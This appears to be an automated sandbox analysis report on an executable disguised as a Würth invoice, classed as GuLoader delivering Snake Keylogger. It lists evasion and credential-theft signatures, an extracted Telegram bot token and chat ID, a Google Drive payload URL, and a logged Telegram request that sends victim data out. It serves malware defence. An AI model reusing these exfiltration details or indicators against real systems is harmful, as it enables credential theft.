Windows Analysis Report
Wuerth_factura_4052073226..exe

Overview

General Information

Sample name: Wuerth_factura_4052073226..exe
Analysis ID: 1537095
MD5: 787041cd8d6cd5e63534d1b060889a76
SHA1: 82da83771130fbe29d2443635757c3cf5c3949c6
SHA256: 4447fbf1066bc4f640abff84fcac04d0c86664f9823410348a36c280ac80e26d
Tags: exe

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7777204705:AAGdGJgXaEaWvE6yXv7RvWYjJkTQCsiDnJc", "Chat_id": "7698865320", "Version": "4.4"}
Source: Wuerth_factura_4052073226..exe ReversingLabs: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Wuerth_factura_4052073226..exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A5F87A8 CryptUnprotectData, 4_2_3A5F87A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_3A5F8EF1 CryptUnprotectData, 4_2_3A5F8EF1
Source: Wuerth_factura_4052073226..exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49980 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: Wuerth_factura_4052073226..exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_00406370 FindFirstFileW,FindClose, 0_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_00406370 FindFirstFileW,FindClose, 4_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_0040581E DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_004027FB FindFirstFileW, 4_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 000DF45Dh 4_2_000DF2C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 000DF45Dh 4_2_000DF4AC
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 000DF45Dh 4_2_000DF52F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 000DFC19h 4_2_000DF974
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DB31E0h 4_2_39DB2DC8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DB2C19h 4_2_39DB2968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DB31E0h 4_2_39DB2DB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBDC51h 4_2_39DBD9A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBD7F9h 4_2_39DBD550
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DB31E0h 4_2_39DB310E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBD3A1h 4_2_39DBD0F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBCF49h 4_2_39DBCCA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_39DB0853
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_39DB0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBFAB9h 4_2_39DBF810
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBF661h 4_2_39DBF3B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBF209h 4_2_39DBEF60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBEDB1h 4_2_39DBEB08
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DB0D0Dh 4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DB1697h 4_2_39DB0B30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBE959h 4_2_39DBE6B0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBE501h 4_2_39DBE258
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_39DB0673
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 39DBE0A9h 4_2_39DBDE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F5179h 4_2_3A5F4ED0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F7EB5h 4_2_3A5F7B78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F9280h 4_2_3A5F8FB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F1CF9h 4_2_3A5F1A50
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FD146h 4_2_3A5FCE78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F4D21h 4_2_3A5F4A78
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F7119h 4_2_3A5F6E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FF136h 4_2_3A5FEE68
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F6CC1h 4_2_3A5F6A18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F48C9h 4_2_3A5F4620
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F7571h 4_2_3A5F72C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FF5C6h 4_2_3A5FF2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F2151h 4_2_3A5F1EA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F2A01h 4_2_3A5F2758
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FB5E6h 4_2_3A5FB318
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FD5D6h 4_2_3A5FD308
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F25A9h 4_2_3A5F2300
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F55D1h 4_2_3A5F5328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F79C9h 4_2_3A5F7720
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F5E81h 4_2_3A5F5BD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FDA66h 4_2_3A5FD798
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FFA56h 4_2_3A5FF788
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F5A29h 4_2_3A5F5780
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F2E59h 4_2_3A5F2BB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FBA76h 4_2_3A5FB7A8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F02E9h 4_2_3A5F0040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F3709h 4_2_3A5F3460
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F32B1h 4_2_3A5F3008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FBF06h 4_2_3A5FBC38
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F62D9h 4_2_3A5F6030
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FDEF6h 4_2_3A5FDC28
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FC396h 4_2_3A5FC0C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F0B99h 4_2_3A5F08F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F0741h 4_2_3A5F0498
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F6733h 4_2_3A5F6488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then mov esp, ebp 4_2_3A5FB081
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FE386h 4_2_3A5FE0B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FC826h 4_2_3A5FC558
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FE816h 4_2_3A5FE548
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F0FF1h 4_2_3A5F0D48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FECA6h 4_2_3A5FE9D8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F18A1h 4_2_3A5F15F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5FCCB6h 4_2_3A5FC9E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A5F1449h 4_2_3A5F11A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A666970h 4_2_3A666678
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A666347h 4_2_3A665FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66A2D0h 4_2_3A669FD8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A660C2Eh 4_2_3A660960
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A668158h 4_2_3A667E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66AC60h 4_2_3A66A968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66D768h 4_2_3A66D470
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A664746h 4_2_3A664478
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66030Eh 4_2_3A660040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A666E38h 4_2_3A666B40
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A665E16h 4_2_3A665B48
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A669940h 4_2_3A669648
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66C448h 4_2_3A66C150
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A663E26h 4_2_3A663B58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66EF50h 4_2_3A66EC58
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66F418h 4_2_3A66F120
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A6654F6h 4_2_3A665228
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A668620h 4_2_3A668328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66B128h 4_2_3A66AE30
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A663506h 4_2_3A663238
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66DC30h 4_2_3A66D938
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66E0F8h 4_2_3A66DE00
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A664BD7h 4_2_3A664908
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A667300h 4_2_3A667008
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A6619DEh 4_2_3A661710
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A669E08h 4_2_3A669B10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A662BE6h 4_2_3A662918
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66C910h 4_2_3A66C618
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66CDD8h 4_2_3A66CAE0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A6642B6h 4_2_3A663FE8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66F8E0h 4_2_3A66F5E8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A6610BEh 4_2_3A660DF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A668AE8h 4_2_3A6687F0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A6622C6h 4_2_3A661FF8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66B5F0h 4_2_3A66B2F8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66BAB8h 4_2_3A66B7C0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A663996h 4_2_3A6636C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66E5C0h 4_2_3A66E2C8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66079Eh 4_2_3A6604D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A6677C8h 4_2_3A6674D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A661E47h 4_2_3A661BA0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66A798h 4_2_3A66A4A0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A663076h 4_2_3A662DA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66D2A0h 4_2_3A66CFA8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66FDA8h 4_2_3A66FAB0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A665986h 4_2_3A6656B8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A668FB0h 4_2_3A668CB8
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66154Eh 4_2_3A661280
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A669478h 4_2_3A669180
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A662756h 4_2_3A662488
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66BF80h 4_2_3A66BC88
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A66EA88h 4_2_3A66E790
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A665066h 4_2_3A664D98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A667C90h 4_2_3A667998
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A691FE8h 4_2_3A691CF0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A690338h 4_2_3A690040
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A691B20h 4_2_3A691828
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A691190h 4_2_3A690E98
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A691658h 4_2_3A691360
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A690801h 4_2_3A690508
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then jmp 3A690CC8h 4_2_3A6909D0
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3A813E70
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3A813E60
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3A810A10
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3A8108DE
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3A810960

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2019/10/2024%20/%2007:08:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49982 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49981 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49980 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM HTTP/1.1 | User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1_SER_W1hRzLv2OKsg5Y8Ur8eTx8b1FZM&export=download HTTP/1.1 | User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 18 Oct 2024 13:05:28 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
